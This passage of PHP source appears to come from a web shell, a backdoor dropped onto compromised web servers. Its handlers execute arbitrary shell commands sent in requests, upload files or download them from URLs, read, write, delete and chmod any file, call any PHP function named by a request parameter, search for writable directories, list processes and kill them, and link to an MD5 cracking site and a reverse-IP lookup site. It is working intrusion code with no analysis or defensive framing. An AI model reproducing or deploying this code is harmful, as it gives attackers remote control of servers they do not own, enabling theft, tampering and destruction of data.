1447"<tr><td>Your e-mail:</td><td><input type=\"text\" name=\"sender_email\" value=\"".htmlspecialchars($sender_email)."\"></td></tr>".
1448"<tr><td>To:</td><td><input type=\"text\" name=\"dest_email\" value=\"".htmlspecialchars($dest_email)."\"></td></tr>".
1449"<tr><td>Subject:</td><td><input size=70 type=\"text\" name=\"sender_subj\" value=\"".htmlspecialchars($sender_subj)."\"></td></tr>".
1450"<tr><td>Message:</td><td><textarea name=\"sender_body\" cols=80 rows=10>".htmlspecialchars($sender_body)."</textarea><br>".
1451"<tr><td></td><td><input type=\"submit\" name=\"submit\" value=\"Send\"></form></td></tr>".
1452"</table>\n";
1453}
1454}
1455if ($act == 'dec') {
1456?>
1457<iframe
1458src ="http://www.md5decrypter.co.uk/"
1459height="600"
1460width="100%">
1461</iframe>
1462<?php
1463}
1464if ($act == 'rev') {
1465?>
1466<iframe
1467src ="http://www.yougetsignal.com/tools/web-sites-on-web-server//"
1468height="600"
1469width="100%">
1470</iframe>
1471<?php
1472}
1473if ($act == "search") {
1474echo "<div class=barheader>.: $sh_name File-System Search :.</div>";
1475if (empty($search_in)) {$search_in = $d;}
1476if (empty($search_name)) {$search_name = "(.*)"; $search_name_regexp = 1;}
1477if (empty($search_text_wwo)) {$search_text_regexp = 0;}
1478if (!empty($submit)) {
1479$found = array();
1480$found_d = 0;
1481$found_f = 0;
1482$search_i_f = 0;
1483$search_i_d = 0;
1484$a = array(
1485"name"=>$search_name,
1486"name_regexp"=>$search_name_regexp,
1487"text"=>$search_text,
1488"text_regexp"=>$search_text_regxp,
1489"text_wwo"=>$search_text_wwo,
1490"text_cs"=>$search_text_cs,
1491"text_not"=>$search_text_not
1492);
1493$searchtime = getmicrotime();
1494$in = array_unique(explode(";",$search_in));
1495foreach($in as $v) {tpfsearch($v);}
1496$searchtime = round(getmicrotime()-$searchtime,4);
1497if (count($found) == 0) {echo "No files found!";}
1498else {
1499$ls_arr = $found;
1500$disp_fullpath = TRUE;
1501$act = "ls";
1502}
1503}
1504echo "<table class=contents>".
1505"<tr><td><form method=POST>".
1506"<input type=hidden name=\"d\" value=\"".$dispd."\"><input type=hidden name=act value=\"".$dspact."\">".
1507"File or folder Name:</td><td><input type=\"text\" name=\"search_name\" size=\"".round(strlen($search_name)+25)."\" value=\"".htmlspecialchars($search_name)."\"> <input type=\"checkbox\" name=\"search_name_regexp\" value=\"1\" ".($search_name_regexp == 1?" checked":"")."> - Regular Expression</td></tr>".
1508"<tr><td>Look in (Separate by \";\"):</td><td><input type=\"text\" name=\"search_in\" size=\"".round(strlen($search_in)+25)."\" value=\"".htmlspecialchars($search_in)."\"></td></tr>".
1509"<tr><td>A word or phrase in the file:</td><td><textarea name=\"search_text\" cols=\"50\" rows=\"5\">".htmlspecialchars($search_text)."</textarea></td></tr>".
1510"<tr><td></td><td><input type=\"checkbox\" name=\"search_text_regexp\" value=\"1\" ".($search_text_regexp == 1?" checked":"")."> Regular Expression".
1511" <input type=\"checkbox\" name=\"search_text_wwo\" value=\"1\" ".($search_text_wwo == 1?" checked":"")."> Whole words only".
1512" <input type=\"checkbox\" name=\"search_text_cs\" value=\"1\" ".($search_text_cs == 1?" checked":"")."> Case sensitive".
1513" <input type=\"checkbox\" name=\"search_text_not\" value=\"1\" ".($search_text_not == 1?" checked":"")."> Find files NOT containing the text</td></tr>".
1514"<tr><td></td><td><input type=submit name=submit value=\"Search\"></form></td></tr>".
1515"</table>\n";
1516if ($act == "ls") {
1517$dspact = $act;
1518echo $searchtime." secs (".$search_i_f." files and ".$search_i_d." folders, ".round(($search_i_f+$search_i_d)/$searchtime,4)." objects per second).</b>".
1519"<hr size=\"1\" noshade>";
1520}
1521}
1522if ($act == "chmod") {
1523$mode = fileperms($d.$f);
1524if (!$mode) {echo "<b>Change file-mode with error:</b> can't get current value.";}
1525else {
1526$form = TRUE;
1527if ($chmod_submit) {
1528$octet = "0".base_convert(($chmod_o["r"]?1:0).($chmod_o["w"]?1:0).($chmod_o["x"]?1:0).($chmod_g["r"]?1:0).($chmod_g["w"]?1:0).($chmod_g["x"]?1:0).($chmod_w["r"]?1:0).($chmod_w["w"]?1:0).($chmod_w["x"]?1:0),2,8);
1529if (chmod($d.$f,$octet)) { $act = "ls"; $form = FALSE; $err = ""; }
1530else {$err = "Can't chmod to ".$octet.".";}
1531}
1532if ($form) {
1533$perms = parse_perms($mode);
1534echo "<b>Changing file-mode (".$d.$f."), ".view_perms_color($d.$f)." (".substr(decoct(fileperms($d.$f)),-4,4).")</b><br>".($err?"<b>Error:</b> ".$err:"")."<form action=\"".$surl."\" method=POST><input type=hidden name=d value=\"".htmlspecialchars($d)."\"><input type=hidden name=f value=\"".htmlspecialchars($f)."\"><input type=hidden name=act value=chmod><table align=left width=300 border=0 cellspacing=0 cellpadding=5><tr><td><b>Owner</b><br><br><input type=checkbox NAME=chmod_o[r] value=1".($perms["o"]["r"]?" checked":"")."> Read<br><input type=checkbox name=chmod_o[w] value=1".($perms["o"]["w"]?" checked":"")."> Write<br><input type=checkbox NAME=chmod_o[x] value=1".($perms["o"]["x"]?" checked":"").">eXecute</td><td><b>Group</b><br><br><input type=checkbox NAME=chmod_g[r] value=1".($perms["g"]["r"]?" checked":"")."> Read<br><input type=checkbox NAME=chmod_g[w] value=1".($perms["g"]["w"]?" checked":"")."> Write<br><input type=checkbox NAME=chmod_g[x] value=1".($perms["g"]["x"]?" checked":"").">eXecute</font></td><td><b>World</b><br><br><input type=checkbox NAME=chmod_w[r] value=1".($perms["w"]["r"]?" checked":"")."> Read<br><input type=checkbox NAME=chmod_w[w] value=1".($perms["w"]["w"]?" checked":"")."> Write<br><input type=checkbox NAME=chmod_w[x] value=1".($perms["w"]["x"]?" checked":"").">eXecute</font></td></tr><tr><td><input type=submit name=chmod_submit value=\"Save\"></td></tr></table></form>";
1535}
1536}
1537}
1538if ($act == "upload") {
1539$uploadmess = "";
1540$uploadpath = str_replace("\\",DIRECTORY_SEPARATOR,$uploadpath);
1541if (empty($uploadpath)) {$uploadpath = $d;}
1542elseif (substr($uploadpath,-1) != DIRECTORY_SEPARATOR) {$uploadpath .= DIRECTORY_SEPARATOR;}
1543if (!empty($submit)) {
1544global $_FILES;
1545$uploadfile = $_FILES["uploadfile"];
1546if (!empty($uploadfile["tmp_name"])) {
1547if (empty($uploadfilename)) {$destin = $uploadfile["name"];}
1548else {$destin = $userfilename;}
1549if (!move_uploaded_file($uploadfile["tmp_name"],$uploadpath.$destin)) {
1550$uploadmess .= "Error uploading file ".$uploadfile["name"]." (can't copy \"".$uploadfile["tmp_name"]."\" to \"".$uploadpath.$destin."\"<br>";
1551}
1552else { $uploadmess .= "File uploaded successfully!<br>".$uploadpath.$destin; }
1553}
1554else { echo "No file to upload!"; }
1555}
1556if ($miniform) {
1557echo "<b>".$uploadmess."</b>";
1558$act = "ls";
1559}
1560else {
1561echo "<table><tr><td colspan=2 class=barheader>".
1562".: File Upload :.</td>".
1563"<td colspan=2>".$uploadmess."</td></tr>".
1564"<tr><td><form enctype=\"multipart/form-data\" action=\"".$surl."act=upload&d=".urlencode($d)."\" method=POST>".
1565"From Your Computer:</td><td><input name=\"uploadfile\" type=\"file\"></td></tr>".
1566"<tr><td>From URL:</td><td><input name=\"uploadurl\" type=\"text\" value=\"".htmlspecialchars($uploadurl)."\" size=\"70\"></td></tr>".
1567"<tr><td>Target Directory:</td><td><input name=\"uploadpath\" size=\"70\" value=\"".$dispd."\"></td></tr>".
1568"<tr><td>Target File Name:</td><td><input name=uploadfilename size=25></td></tr>".
1569"<tr><td></td><td><input type=checkbox name=uploadautoname value=1 id=df4> Convert file name to lowercase</td></tr>".
1570"<tr><td></td><td><input type=submit name=submit value=\"Upload\">".
1571"</form></td></tr></table>";
1572}
1573}
1574if ($act == "delete") {
1575$delerr = "";
1576foreach ($actbox as $v) {
1577$result = FALSE;
1578$result = fs_rmobj($v);
1579if (!$result) { $delerr .= "Can't delete ".htmlspecialchars($v)."<br>"; }
1580}
1581if (!empty($delerr)) { echo "<b>Error deleting:</b><br>".$delerr; }
1582$act = "ls";
1583}
1584if (!$usefsbuff) {
1585if (($act == "paste") or ($act == "copy") or ($act == "cut") or ($act == "unselect")) {
1586echo "<center><b>Sorry, buffer is disabled. For enable, set directive \"\$usefsbuff\" as TRUE.</center>";
1587}
1588}
1589else {
1590if ($act == "copy") {$err = ""; $sess_data["copy"] = array_merge($sess_data["copy"],$actbox); tp_sess_put($sess_data); $act = "ls"; }
1591elseif ($act == "cut") {$sess_data["cut"] = array_merge($sess_data["cut"],$actbox); tp_sess_put($sess_data); $act = "ls";}
1592elseif ($act == "unselect") {foreach ($sess_data["copy"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["copy"][$k]);}} foreach ($sess_data["cut"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["cut"][$k]);}} tp_sess_put($sess_data); $act = "ls";}
1593if ($actemptybuff) {$sess_data["copy"] = $sess_data["cut"] = array(); tp_sess_put($sess_data);}
1594elseif ($actpastebuff) {
1595$psterr = "";
1596foreach($sess_data["copy"] as $k=>$v) {
1597$to = $d.basename($v);
1598if (!fs_copy_obj($v,$to)) {$psterr .= "Can't copy ".$v." to ".$to."<br>";}
1599if ($copy_unset) {unset($sess_data["copy"][$k]);}
1600}
1601foreach($sess_data["cut"] as $k=>$v) {
1602$to = $d.basename($v);
1603if (!fs_move_obj($v,$to)) {$psterr .= "Can't move ".$v." to ".$to."<br>";}
1604unset($sess_data["cut"][$k]);
1605}
1606tp_sess_put($sess_data);
1607if (!empty($psterr)) {echo "<b>Pasting with errors:</b><br>".$psterr;}
1608$act = "ls";
1609}
1610elseif ($actarcbuff) {
1611$arcerr = "";
1612if (substr($actarcbuff_path,-7,7) == ".tar.gz") {$ext = ".tar.gz";}
1613else {$ext = ".tar.gz";}
1614if ($ext == ".tar.gz") {$cmdline = "tar cfzv";}
1615$cmdline .= " ".$actarcbuff_path;
1616$objects = array_merge($sess_data["copy"],$sess_data["cut"]);
1617foreach($objects as $v) {
1618$v = str_replace("\\",DIRECTORY_SEPARATOR,$v);
1619if (substr($v,0,strlen($d)) == $d) {$v = basename($v);}
1620if (is_dir($v)) {
1621if (substr($v,-1) != DIRECTORY_SEPARATOR) {$v .= DIRECTORY_SEPARATOR;}
1622$v .= "*";
1623}
1624$cmdline .= " ".$v;
1625}
1626$tmp = realpath(".");
1627chdir($d);
1628$ret = tpexec($cmdline);
1629chdir($tmp);
1630if (empty($ret)) {$arcerr .= "Can't call archivator (".htmlspecialchars(str2mini($cmdline,60)).")!<br>";}
1631$ret = str_replace("\r\n","\n",$ret);
1632$ret = explode("\n",$ret);
1633if ($copy_unset) {foreach($sess_data["copy"] as $k=>$v) {unset($sess_data["copy"][$k]);}}
1634foreach($sess_data["cut"] as $k=>$v) {
1635if (in_array($v,$ret)) {fs_rmobj($v);}
1636unset($sess_data["cut"][$k]);
1637}
1638tp_sess_put($sess_data);
1639if (!empty($arcerr)) {echo "<b>Archivation errors:</b><br>".$arcerr;}
1640$act = "ls";
1641}
1642elseif ($actpastebuff) {
1643$psterr = "";
1644foreach($sess_data["copy"] as $k=>$v) {
1645$to = $d.basename($v);
1646if (!fs_copy_obj($v,$d)) {$psterr .= "Can't copy ".$v." to ".$to."<br>";}
1647if ($copy_unset) {unset($sess_data["copy"][$k]);}
1648}
1649foreach($sess_data["cut"] as $k=>$v) {
1650$to = $d.basename($v);
1651if (!fs_move_obj($v,$d)) {$psterr .= "Can't move ".$v." to ".$to."<br>";}
1652unset($sess_data["cut"][$k]);
1653}
1654tp_sess_put($sess_data);
1655if (!empty($psterr)) {echo "<b>Error pasting:</b><br>".$psterr;}
1656$act = "ls";
1657}
1658}
1659if ($act == "cmd") {
1660@chdir($chdir);
1661if (!empty($submit)) {
1662echo "<div class=barheader>.: Results of Execution :.</div>\n";
1663$olddir = realpath(".");
1664@chdir($d);
1665$ret = tpexec($cmd);
1666$ret = convert_cyr_string($ret,"d","w");
1667if ($cmd_txt) {
1668$rows = count(explode("\n",$ret))+1;
1669if ($rows < 10) { $rows = 10; } else { $rows = 30; }
1670$cols = 130;
1671echo "<textarea class=shell cols=\"$cols\" rows=\"$rows\" readonly>".htmlspecialchars($ret)."</textarea>\n";
1672//echo "<div align=left><pre>".htmlspecialchars($ret)."</pre></div>";
1673}
1674else { echo $ret."<br>"; }
1675@chdir($olddir);
1676}
1677}
1678if ($act == "ls") {
1679if (count($ls_arr) > 0) { $list = $ls_arr; }
1680else {
1681$list = array();
1682if ($h = @opendir($d)) {
1683while (($o = readdir($h)) !== FALSE) {$list[] = $d.$o;}
1684closedir($h);
1685}
1686}
1687if (count($list) == 0) { echo "<div class=fxerrmsg>Can't open folder (".htmlspecialchars($d).")!</div>";}
1688else {
1689$objects = array();
1690$vd = "f"; //Viewing mode
1691if ($vd == "f") {
1692$objects["head"] = array();
1693$objects["folders"] = array();
1694$objects["links"] = array();
1695$objects["files"] = array();
1696foreach ($list as $v) {
1697$o = basename($v);
1698$row = array();
1699if ($o == ".") {$row[] = $d.$o; $row[] = "CURDIR";}
1700elseif ($o == "..") {$row[] = $d.$o; $row[] = "UPDIR";}
1701elseif (is_dir($v)) {
1702if (is_link($v)) {$type = "LINK";}
1703else {$type = "DIR";}
1704$row[] = $v;
1705$row[] = $type;
1706}
1707elseif(is_file($v)) {$row[] = $v; $row[] = filesize($v);}
1708$row[] = filemtime($v);
1709if (!$win) {
1710$ow = posix_getpwuid(fileowner($v));
1711$gr = posix_getgrgid(filegroup($v));
1712$row[] = ($ow["name"]?$ow["name"]:fileowner($v))."/".($gr["name"]?$gr["name"]:filegroup($v));
1713}
1714$row[] = fileperms($v);
1715if (($o == ".") or ($o == "..")) {$objects["head"][] = $row;}
1716elseif (is_link($v)) {$objects["links"][] = $row;}
1717elseif (is_dir($v)) {$objects["folders"][] = $row;}
1718elseif (is_file($v)) {$objects["files"][] = $row;}
1719$i++;
1720}
1721$row = array();
1722$row[] = "<b>Name</b>";
1723$row[] = "<b>Size</b>";
1724$row[] = "<b>Date Modified</b>";
1725if (!$win) {$row[] = "<b>Owner/Group</b>";}
1726$row[] = "<b>Perms</b>";
1727$row[] = "<b>Action</b>";
1728$parsesort = parsesort($sort);
1729$sort = $parsesort[0].$parsesort[1];
1730$k = $parsesort[0];
1731if ($parsesort[1] != "a") {$parsesort[1] = "d";}
1732$y = " <a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&sort=".$k.($parsesort[1] == "a"?"d":"a")."\">";
1733$y .= "<img src=\"".$surl."act=img&img=sort_".($sort[1] == "a"?"asc":"desc")."\" height=\"9\" width=\"14\" alt=\"".($parsesort[1] == "a"?"Asc.":"Desc")."\" border=\"0\"></a>";
1734$row[$k] .= $y;
1735for($i=0;$i<count($row)-1;$i++) {
1736if ($i != $k) {$row[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&sort=".$i.$parsesort[1]."\">".$row[$i]."</a>";}
1737}
1738$v = $parsesort[0];
1739usort($objects["folders"], "tabsort");
1740usort($objects["links"], "tabsort");
1741usort($objects["files"], "tabsort");
1742if ($parsesort[1] == "d") {
1743$objects["folders"] = array_reverse($objects["folders"]);
1744$objects["files"] = array_reverse($objects["files"]);
1745}
1746$objects = array_merge($objects["head"],$objects["folders"],$objects["links"],$objects["files"]);
1747$tab = array();
1748$tab["cols"] = array($row);
1749$tab["head"] = array();
1750$tab["folders"] = array();
1751$tab["links"] = array();
1752$tab["files"] = array();
1753$i = 0;
1754foreach ($objects as $a) {
1755$v = $a[0];
1756$o = basename($v);
1757$dir = dirname($v);
1758if ($disp_fullpath) {$disppath = $v;}
1759else {$disppath = $o;}
1760$disppath = str2mini($disppath,60);
1761if (in_array($v,$sess_data["cut"])) {$disppath = "<strike>".$disppath."</strike>";}
1762elseif (in_array($v,$sess_data["copy"])) {$disppath = "<u>".$disppath."</u>";}
1763foreach ($regxp_highlight as $r) {
1764if (ereg($r[0],$o)) {
1765if ((!is_numeric($r[1])) or ($r[1] > 3)) {$r[1] = 0; ob_clean(); echo "Warning! Configuration error in \$regxp_highlight[".$k."][0] - unknown command."; tpshexit();}
1766else {
1767$r[1] = round($r[1]);
1768$isdir = is_dir($v);
1769if (($r[1] == 0) or (($r[1] == 1) and !$isdir) or (($r[1] == 2) and !$isdir)) {
1770if (empty($r[2])) {$r[2] = "<b>"; $r[3] = "</b>";}
1771$disppath = $r[2].$disppath.$r[3];
1772if ($r[4]) {break;}
1773}
1774}
1775}
1776}
1777$uo = urlencode($o);
1778$ud = urlencode($dir);
1779$uv = urlencode($v);
1780$row = array();
1781if ($o == ".") {
1782$row[] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode(realpath($d.$o))."&sort=".$sort."\"><img src=\"".$surl."act=img&img=small_dir\" border=\"0\"> ".$o."</a>";
1783$row[] = "CURDIR";
1784}
1785elseif ($o == "..") {
1786$row[] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode(realpath($d.$o))."&sort=".$sort."\"><img src=\"".$surl."act=img&img=ext_lnk\" border=\"0\"> ".$o."</a>";
1787$row[] = "UPDIR";
1788}
1789elseif (is_dir($v)) {
1790if (is_link($v)) {
1791$disppath .= " => ".readlink($v);
1792$type = "LINK";
1793$row[] = "<a href=\"".$surl."act=ls&d=".$uv."&sort=".$sort."\"><img src=\"".$surl."act=img&img=ext_lnk\" border=\"0\"> [".$disppath."]</a>";
1794}
1795else {
1796$type = "DIR";
1797$row[] = "<a href=\"".$surl."act=ls&d=".$uv."&sort=".$sort."\"><img src=\"".$surl."act=img&img=small_dir\" border=\"0\"> [".$disppath."]</a>";
1798}
1799$row[] = $type;
1800}
1801elseif(is_file($v)) {
1802$ext = explode(".",$o);
1803$c = count($ext)-1;
1804$ext = $ext[$c];
1805$ext = strtolower($ext);
1806$row[] = "<a href=\"".$surl."act=f&f=".$uo."&d=".$ud."\"><img src=\"".$surl."act=img&img=ext_".$ext."\" border=\"0\"> ".$disppath."</a>";
1807$row[] = view_size($a[1]);
1808}
1809$row[] = @date("d.m.Y H:i:s",$a[2]);
1810if (!$win) { $row[] = $a[3]; }
1811$row[] = "<a href=\"".$surl."act=chmod&f=".$uo."&d=".$ud."\"><b>".view_perms_color($v)."</b></a>";
1812if ($o == ".") {$checkbox = "<input type=\"checkbox\" name=\"actbox[]\" onclick=\"ls_reverse_all();\">"; $i--;}
1813else {$checkbox = "<input type=\"checkbox\" name=\"actbox[]\" id=\"actbox".$i."\" value=\"".htmlspecialchars($v)."\">";}
1814if (is_dir($v)) {$row[] = "<a href=\"".$surl."act=d&d=".$uv."\"><img src=\"".$surl."act=img&img=ext_diz\" alt=\"Info\" border=\"0\"></a> ".$checkbox;}
1815else {$row[] = "<a href=\"".$surl."act=f&f=".$uo."&ft=info&d=".$ud."\"><img src=\"".$surl."act=img&img=ext_diz\" alt=\"Info\" height=\"16\" width=\"16\" border=\"0\"></a> <a href=\"".$surl."act=f&f=".$uo."&ft=edit&d=".$ud."\"><img src=\"".$surl."act=img&img=change\" alt=\"Edit\" height=\"16\" width=\"19\" border=\"0\"></a> <a href=\"".$surl."act=f&f=".$uo."&ft=download&d=".$ud."\"><img src=\"".$surl."act=img&img=download\" alt=\"Download\" border=\"0\"></a> ".$checkbox;}
1816if (($o == ".") or ($o == "..")) {$tab["head"][] = $row;}
1817elseif (is_link($v)) {$tab["links"][] = $row;}
1818elseif (is_dir($v)) {$tab["folders"][] = $row;}
1819elseif (is_file($v)) {$tab["files"][] = $row;}
1820$i++;
1821}
1822}
1823// Compiling table
1824$table = array_merge($tab["cols"],$tab["head"],$tab["folders"],$tab["links"],$tab["files"]);
1825echo "<div class=barheader>.: ";
1826if (!empty($fx_infohead)) { echo $fx_infohead; }
1827else { echo "Directory List (".count($tab["files"])." files and ".(count($tab["folders"])+count($tab["links"]))." folders)"; }
1828echo " :.</div>\n";
1829echo "<form action=\"".$surl."\" method=POST name=\"ls_form\"><input type=hidden name=act value=\"".$dspact."\"><input type=hidden name=d value=".$d.">".
1830"<table class=explorer>";
1831foreach($table as $row) {
1832echo "<tr>";
1833foreach($row as $v) {echo "<td>".$v."</td>";}
1834echo "</tr>\r\n";
1835}
1836echo "</table>".
1837"<script>".
1838"function ls_setcheckboxall(status) {".
1839" var id = 1; var num = ".(count($table)-2).";".
1840" while (id <= num) { document.getElementById('actbox'+id).checked = status; id++; }".
1841"}".
1842"function ls_reverse_all() {".
1843" var id = 1; var num = ".(count($table)-2).";".
1844" while (id <= num) { document.getElementById('actbox'+id).checked = !document.getElementById('actbox'+id).checked; id++; }".
1845"}".
1846"</script>".
1847"<div align=\"right\">".
1848"<input type=\"button\" onclick=\"ls_setcheckboxall(true);\" value=\"Select all\"> <input type=\"button\" onclick=\"ls_setcheckboxall(false);\" value=\"Unselect all\">".
1849"<img src=\"".$surl."act=img&img=arrow_ltr\" border=\"0\">";
1850if (count(array_merge($sess_data["copy"],$sess_data["cut"])) > 0 and ($usefsbuff)) {
1851echo "<input type=submit name=actarcbuff value=\"Pack buffer to archive\"> <input type=\"text\" name=\"actarcbuff_path\" value=\"fx_archive_".substr(md5(rand(1,1000).rand(1,1000)),0,5).".tar.gz\"> <input type=submit name=\"actpastebuff\" value=\"Paste\"> <input type=submit name=\"actemptybuff\" value=\"Empty buffer\"> ";
1852}
1853echo "<select name=act><option value=\"".$act."\">With selected:</option>";
1854echo "<option value=delete".($dspact == "delete"?" selected":"").">Delete</option>";
1855echo "<option value=chmod".($dspact == "chmod"?" selected":"").">Change-mode</option>";
1856if ($usefsbuff) {
1857echo "<option value=cut".($dspact == "cut"?" selected":"").">Cut</option>";
1858echo "<option value=copy".($dspact == "copy"?" selected":"").">Copy</option>";
1859echo "<option value=unselect".($dspact == "unselect"?" selected":"").">Unselect</option>";
1860}
1861echo "</select> <input type=submit value=\"Confirm\"></div>";
1862echo "</form>";
1863}
1864}
1865
1866if ($act == "phpfsys") {
1867echo "<div align=left>";
1868$fsfunc = $phpfsysfunc;
1869if ($fsfunc=="copy") {
1870if (!copy($arg1, $arg2)) { echo "Failed to copy $arg1...\n";}
1871else { echo "<b>Success!</b> $arg1 copied to $arg2\n"; }
1872}
1873elseif ($fsfunc=="rename") {
1874if (!rename($arg1, $arg2)) { echo "Failed to rename/move $arg1!\n";}
1875else { echo "<b>Success!</b> $arg1 renamed/moved to $arg2\n"; }
1876}
1877elseif ($fsfunc=="chmod") {
1878if (!chmod($arg1,$arg2)) { echo "Failed to chmod $arg1!\n";}
1879else { echo "<b>Perm for $arg1 changed to $arg2!</b>\n"; }
1880}
1881elseif ($fsfunc=="read") {
1882$darg = $d.$arg1;
1883if ($hasil = @file_get_contents($darg)) {
1884echo "<b>Filename:</b> ".$darg."<br>";
1885echo "<center><textarea cols=135 rows=30>";
1886echo htmlentities($hasil);
1887echo "</textarea></center>\n";
1888}
1889else { echo "<div class=fxerrmsg> Couldn't open ".$darg."<div>"; }
1890}
1891elseif ($fsfunc=="write") {
1892$darg = $d.$arg1;
1893if(@file_put_contents($darg,$arg2)) {
1894echo "<b>Saved!</b> ".$darg;
1895}
1896else { echo "<div class=fxerrmsg>Can't write to $darg!</div>"; }
1897}
1898elseif ($fsfunc=="downloadbin") {
1899$handle = fopen($arg1, "rb");
1900$contents = '';
1901while (!feof($handle)) {
1902$contents .= fread($handle, 8192);
1903}
1904$r = @fopen($d.$arg2,'w');
1905if (fwrite($r,$contents)) { echo "<b>Success!</b> $arg1 saved to ".$d.$arg2." (".view_size(filesize($d.$arg2)).")"; }
1906else { echo "<div class=fxerrmsg>Can't write to ".$d.$arg2."</div>"; }
1907fclose($r);
1908fclose($handle);
1909}
1910elseif ($fsfunc=="download") {
1911$text = implode('', file($arg1));
1912if ($text) {
1913$r = @fopen($d.$arg2,'w');
1914if (fwrite($r,$text)) { echo "<b>Success!</b> $arg1 saved to ".$d.$arg2." (".view_size(filesize($d.$arg2)).")"; }
1915else { echo "<div class=fxerrmsg>Can't write to ".$d.$arg2."</div>"; }
1916fclose($r);
1917}
1918else { echo "<div class=fxerrmsg>Can't download from $arg1!</div>";}
1919}
1920elseif ($fsfunc=='mkdir') {
1921$thedir = $d.$arg1;
1922if ($thedir != $d) {
1923if (file_exists($thedir)) { echo "<b>Already exists:</b> ".htmlspecialchars($thedir); }
1924elseif (!mkdir($thedir)) { echo "<b>Access denied:</b> ".htmlspecialchars($thedir); }
1925else { echo "<b>Dir created:</b> ".htmlspecialchars($thedir);}
1926}
1927else { echo "Can't create current dir:<b> $thedir</b>"; }
1928}
1929elseif ($fsfunc=='fwritabledir') {
1930function recurse_dir($dir,$max_dir) {
1931global $dir_count;
1932$dir_count++;
1933if( $cdir = dir($dir) ) {
1934while( $entry = $cdir-> read() ) {
1935if( $entry != '.' && $entry != '..' ) {
1936if(is_dir($dir.$entry) && is_writable($dir.$entry) ) {
1937if ($dir_count > $max_dir) { return; }
1938echo "[".$dir_count."] ".$dir.$entry."\n";
1939recurse_dir($dir.$entry.DIRECTORY_SEPARATOR,$max_dir);
1940}
1941}
1942}
1943$cdir->close();
1944}
1945}
1946if (!$arg1) { $arg1 = $d; }
1947if (!$arg2) { $arg2 = 10; }
1948if (is_dir($arg1)) {
1949echo "<b>Writable directories (Max: $arg2) in:</b> $arg1<hr noshade size=1>";
1950echo "<pre>";
1951recurse_dir($arg1,$arg2);
1952echo "</pre>";
1953$total = $dir_count - 1;
1954echo "<hr noshade size=1><b>Founds:</b> ".$total." of <b>Max</b> $arg2";
1955}
1956else {
1957echo "<div class=fxerrmsg>Directory is not exist or permission denied!</div>";
1958}
1959}
1960else {
1961if (!$arg1) { echo "<div class=fxerrmsg>No operation! Please fill parameter [A]!</div>\n"; }
1962else {
1963if ($hasil = $fsfunc($arg1)) {
1964echo "<b>Result of $fsfunc $arg1:</b><br>";
1965if (!is_array($hasil)) { echo "$hasil\n"; }
1966else {
1967echo "<pre>";
1968foreach ($hasil as $v) { echo $v."\n"; }
1969echo "</pre>";
1970}
1971}
1972else { echo "<div class=fxerrmsg>$fsfunc $arg1 failed!</div>\n"; }
1973}
1974}
1975echo "</div>\n";
1976}
1977if ($act == "processes") {
1978echo "<div class=barheader>.: Processes :.</div>\n";
1979if (!$win) { $handler = "ps aux".($grep?" | grep '".addslashes($grep)."'":""); }
1980else { $handler = "tasklist"; }
1981$ret = tpexec($handler);
1982if (!$ret) { echo "Can't execute \"".$handler."\""; }
1983else {
1984if (empty($processes_sort)) { $processes_sort = $sort_default; }
1985$parsesort = parsesort($processes_sort);
1986if (!is_numeric($parsesort[0])) {$parsesort[0] = 0;}
1987$k = $parsesort[0];
1988if ($parsesort[1] != "a") {
1989$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."a\"><img src=\"".$surl."act=img&img=sort_desc\" border=\"0\"></a>";
1990}
1991else {
1992$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."d\"><img src=\"".$surl."act=img&img=sort_asc\" height=\"9\" width=\"14\" border=\"0\"></a>";
1993}
1994$ret = htmlspecialchars($ret);
1995if (!$win) { //Not Windows
1996if ($pid) {
1997if (is_null($sig)) { $sig = 9; }
1998echo "Sending signal ".$sig." to #".$pid."... ";
1999if (posix_kill($pid,$sig)) { echo "OK."; } else { echo "ERROR."; }
2000}
2001while (ereg(" ",$ret)) { $ret = str_replace(" "," ",$ret); }
2002$stack = explode("\n",$ret);
2003$head = explode(" ",$stack[0]);
2004unset($stack[0]);
2005for($i=0;$i<count($head);$i++) {
2006if ($i != $k) {
2007$head[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$i.$parsesort[1]."\"><b>".$head[$i]."</b></a>";
2008}
2009}
2010$head[$i] = "";
2011$prcs = array();
2012foreach ($stack as $line) {
2013if (!empty($line)) {
2014$line = explode(" ",$line);
2015$line[10] = join(" ",array_slice($line,10));
2016$line = array_slice($line,0,11);
2017if ($line[0] == get_current_user()) { $line[0] = "<font color=green>".$line[0]."</font>"; }
2018$line[] = "<a href=\"".$surl."act=processes&d=".urlencode($d)."&pid=".$line[1]."&sig=9\"><u>KILL</u></a>";
2019$prcs[] = $line;
2020}
2021}
2022}
2023
2024else {
2025while (ereg(" ",$ret)) { $ret = str_replace(" "," ",$ret); }
2026while (ereg("=",$ret)) { $ret = str_replace("=","",$ret); }
2027$ret = convert_cyr_string($ret,"d","w");
2028$stack = explode("\n",$ret);
2029unset($stack[0],$stack[2]);
2030$stack = array_values($stack);
2031$stack[0]=str_replace("Image Name","ImageName",$stack[0]);
2032$stack[0]=str_replace("Session Name","SessionName",$stack[0]);
2033$stack[0]=str_replace("Mem Usage","MemoryUsage",$stack[0]);
2034$head = explode(" ",$stack[0]);
2035$stack = array_slice($stack,1);
2036$head = array_values($head);
2037if ($parsesort[1] != "a") { $y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."a\"><img src=\"".$surl."act=img&img=sort_desc\" border=\"0\"></a>"; }
2038else { $y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."d\"><img src=\"".$surl."act=img&img=sort_asc\" border=\"0\"></a>"; }
2039if ($k > count($head)) {$k = count($head)-1;}
2040for($i=0;$i<count($head);$i++) {
2041if ($i != $k) { $head[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$i.$parsesort[1]."\"><b>".trim($head[$i])."</b></a>"; }
2042}
2043$prcs = array();
2044unset($stack[0]);
2045foreach ($stack as $line) {
2046if (!empty($line)) {
2047$line = explode(" ",$line);
2048$line[4] = str_replace(".","",$line[4]);
2049$line[4] = intval($line[4]) * 1024;
